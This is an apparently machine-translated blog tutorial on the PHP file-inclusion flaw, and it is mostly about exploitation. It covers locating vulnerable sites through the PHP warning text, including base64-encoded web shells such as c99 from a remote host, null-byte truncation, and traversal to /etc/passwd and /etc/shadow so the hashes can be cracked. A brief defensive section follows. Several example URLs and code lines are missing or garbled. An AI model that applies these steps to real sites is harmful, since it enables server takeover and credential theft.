PHP Include flaw, what is it and how to protect against it?

include flaw
include flaw

Last updated: January 1, 2023

We have already talked in previous tutorials about the upload flaw and XSS flaw. Today I will present to you the PHP Include flaw which is certainly the most famous PHP flaw in the world of websites, due to a programming error made by a developer who cares little about security.

We will see in detail how to exploit this flaw and of course how to protect yourself from it.

And, no, the article is not going to self-destruct in 5 seconds :), so take the time to read it to learn more about the flaw PHP Include

PHP Include what is it?

This function allows, as its name suggests, to include a page in another, it is used like this:



SIf all your pages require the mysql.php page in which the database connection information is contained, it should be included in each of your pages rather than re-typing the equivalent of mysql.php in all of them. this.

La PHP include function allow you to have only one mysql.php page, and all the pages of your site will include it (same case for menu, header and footer)

How does PHP Include work?

Imagine we have an index.php page with the following code:

if(isset($_GET['page'])) // check if the _GET variable exists

If we type: http:// index.php?page=astuces.php

This piece of code will include (and run) the "tips.php" page. So far, nothing very complicated.
Now what will happen if I type the following url:

Then the Google page will run and display on our server! Imagine that this page in question is a backdoor like c99.php. We can then take control of the hosting server. So we can list all the files on the server, edit them, create them, access the database, etc ...

Detect the presence of a PHP Include flaw?

To detect a flaw PHP includes on a website, you just have to test all the possible parameters of a URL and observe the result. The goal is to crash the website when trying to include a page that doesn't exist.
If a URL is vulnerable then we should get a PHP warning like this:

  • Warning: main ([PARAMETRE_INCORRECT]): failed to open stream: No such file or directory in [URL_DE_LA_PAGE] .php on line [NUMERO_DE_LIGNE]
  • Warning: main (): Failed opening '[PARAMETRE_INCORRECT]' for inclusion (include_path = '.: / Usr / share / php: / usr / share / pear') in [URL_DE_LA_PAGE] .php on line [NUMERO_DE_LIGNE]

Type in the search engine one of the two warnings and you will find what you are looking for! 😀 You can still try but be aware that it is illegal!

How to exploit this flaw?

Exploit the include flaw remotely

First of all, you must have a PHP script (backdoor) ready to use.

For that type in google a precise backdoor like r57, c99, c100 myshell, etc.. It is preferable to encode it in base64 encoding so as not to be detected.

Suppose you have found the PHP Include flaw on a PHP website, and it allows any page to be included. Now all you have to do is place your backdoor on an FTP server or a free server not running PHP.

Whatever solution you choose, you can therefore call the vulnerable page in this way:
index.php? page = http: //
(if it is on an FTP server, obviously replace http: // by ftp: // and indicate the login / pass in the usual way).

And you will see your backdoor display as follows:

Backdoor interface

Sometimes, we come across a vulnerable page but with a code different from the one we saw in the previous paragraph, for example:

include($_GET['page']. ".php");

Here the extension ".php" is automatically added to the variable. This forces our backdoor.php file to become backdoor.php.php and it will not run on the vulnerable server.

So what?

There is a very simple solution to escape this filter. This is the null byte technique. It consists of placing an ASCII zero at the end of our URL. It will therefore be necessary to include:
index.php? page = http: //


The include () function will be processed by a function programmed in C language. And in C, we designate the end of a character string by a null byte (x00 in classical notation). that's why our character string (porte-derobee.php% 00.php) will be truncated by finding the character% 00!

The local include flaw

So far we've only tried to include a remote backdoor. But be aware that it is quite possible, with this flaw, to execute a file located on the vulnerable server! And besides, it is sometimes the only possibility, because some protections disable the ability to include code located on another server.

So we can display all the pages inside the index, like this:
And like that, we will be able to navigate in all the directories of the site, see even the server if it is not chmoder

In practice, it is quite simple, in fact we will try to guess in which directory an interesting file like htpasswd is located, by successively testing parameters like "../.htpasswd" or "../../. htpasswd "or" ../dossier/.htpasswd ".

Or we can go back to the root of the server and then go to the directory that interests us until we see a sensitive file, for example: passwd

Once the password files are recovered, you can crack them with a suitable program like John The Ripper or Cain.

Here are some other files that may be interesting to visit, even if sometimes (like for etc / shadow) it is only accessible for the root user.

/ Etc / passwd
/ Etc / shadow
/ Etc / group
/ etc / security / group
/ etc / security / passwd
/ etc / security / user

Protect yourself from the Include vulnerability

The best way to protect yourself from include PHP is of :

  • Doing a test for each page of your site, it is certainly long but there is nothing better for you to see afterwards.
    if ($ page == "tips") {include ("tips. php")}
    if ($ page == "photos") {include ("photos. php")}
    else {include ("index. php")}
  • In php4, set the allow_url_fopen command to off. The latter allows the reading of files located on another server;
  • In php5, set the allow_url_include command to off. This is an improvement over php4, which distinguishes files read from files included.

As in all articles, I hope that I have met your expectations and that I have been able to bring you something new through this post. I also hope that all webmasters are aware of the danger of this flaw.

EL JAOUARI is an author and trainer. Passionate about IT security and new technologies. His tutorials have helped many people to better master today's computer tools.